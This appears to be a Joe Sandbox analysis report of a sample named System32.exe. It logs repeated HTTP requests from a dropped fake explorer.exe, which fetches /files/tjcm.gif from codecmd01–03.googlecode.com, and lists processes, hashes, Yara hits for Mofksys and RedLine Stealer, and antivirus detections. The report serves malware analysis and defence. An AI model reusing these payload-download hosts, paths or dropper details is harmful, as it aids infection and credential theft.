                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:08.465859890 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      33192.168.2.650001173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:09.169903040 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd01.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:10.580389977 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:29:10 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:10.580524921 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      34192.168.2.650006173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:11.225313902 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd02.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:12.622312069 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:29:12 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:12.622325897 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      35192.168.2.650012173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:13.286533117 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd03.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:14.688066959 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:29:14 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:14.688082933 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      36192.168.2.650018173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:15.553472996 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd01.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:16.953166962 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:29:16 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:16.953233957 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      37192.168.2.650024173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:17.427798986 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd02.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:18.828564882 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:29:18 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:18.828597069 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                      Start time:02:27:11
                                                                                                                                                                                                                                      Start date:16/12/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\System32.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\System32.exe"
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:5'537'484 bytes
                                                                                                                                                                                                                                      MD5 hash:D4817EA043BEAF35D19FA6A5ADAA179C
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000000.00000003.2142890719.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000000.00000002.2286896505.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                                      Start time:02:27:14
                                                                                                                                                                                                                                      Start date:16/12/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\system32.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:c:\users\user\desktop\system32.exe
                                                                                                                                                                                                                                      Imagebase:0x9c0000
                                                                                                                                                                                                                                      File size:307'712 bytes
                                                                                                                                                                                                                                      MD5 hash:C368CB0E4CC65CBDC012E449DE37D973
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000000.2156076125.00000000009C2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\Desktop\system32.exe , Author: Joe Security
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                      • Detection: 87%, ReversingLabs
                                                                                                                                                                                                                                      • Detection: 68%, Virustotal, Browse
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                      Start time:02:27:25
                                                                                                                                                                                                                                      Start date:16/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\Resources\Themes\icsys.icn.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Windows\Resources\Themes\icsys.icn.exe
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:5'229'747 bytes
                                                                                                                                                                                                                                      MD5 hash:6A696257BD624EA0CDDE713FF447B134
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
